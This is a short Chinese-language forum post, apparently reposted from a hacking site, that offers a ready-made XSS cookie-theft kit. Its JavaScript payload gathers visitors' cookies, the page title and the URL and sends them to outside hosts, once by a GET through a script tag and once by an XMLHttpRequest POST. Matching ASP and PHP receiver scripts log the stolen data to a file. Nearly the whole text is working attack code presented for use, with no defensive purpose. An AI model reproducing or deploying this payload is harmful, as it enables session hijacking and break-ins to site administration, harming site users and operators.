大家知道xss攻击最有效的方式就是盗取cookie值。通过盗取cookie值可以进入后台从法客搬过来的~ JS: document.write('<script LANGUAGE="Javascript" src="" id="get">'); function get(url) { var obj = document.getElementById("get"); obj.src = url; } var u="http:// www.2cto.com /1.php?msg="+escape(document.title)+"|"+document.cookie+"|"+escape(document.URL); get(u); function poster(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<10;i++) try { request = new ActiveXObject(versions[i]); } catch(e) {} } return request; } function postmydata(action,data){ xmlhttp.open("POST", action, false); xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xmlhttp.send(data); return xmlhttp.responseText; } xmlhttp=poster(); //data="msg=document.cookie"; data="msg="+escape(document.title)+"|"+document.cookie+"|"+escape(document.URL); postmydata("http://se.bb56.net/1.php",data); 服务器端代码: asp: <% testfile=Server.MapPath("1.txt") msg=Request("msg") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&now()&"|"&msg& "") thisfile.close set fs = nothing %> php: <?php $content=$_REQUEST["msg"]; $time=date('Y-m-d H:i:s',time()); $file="xss.txt"; $fp = fopen($file,"a+"); fwrite($fp,$time."|".$content." "); fclose($fp); ?>